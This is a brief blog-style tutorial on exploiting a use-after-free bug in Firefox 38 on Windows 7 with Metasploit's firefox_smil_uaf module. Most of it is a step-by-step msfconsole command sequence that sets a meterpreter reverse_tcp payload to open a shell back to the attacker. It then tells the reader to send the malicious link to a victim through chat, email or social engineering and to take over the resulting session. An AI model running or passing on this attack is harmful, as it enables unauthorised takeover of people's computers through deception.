Exploit Windows PC using Firefox nsSMIL Time Container: :Notify Time Change() RCE

This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.

Exploit Targets

Firefox 38


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/firefox_smil_uaf

msf exploit (firefox_smil_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_smil_uaf)>set lhost (IP of Local Host)

msf exploit (firefox_smil_uaf)>set srvhost (IP of Local Host)

msf exploit (firefox_smil_uaf)>set uripath / (IP of Local Host)

msf exploit (firefox_smil_uaf)>exploit

Now an URL you should give to your victim victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *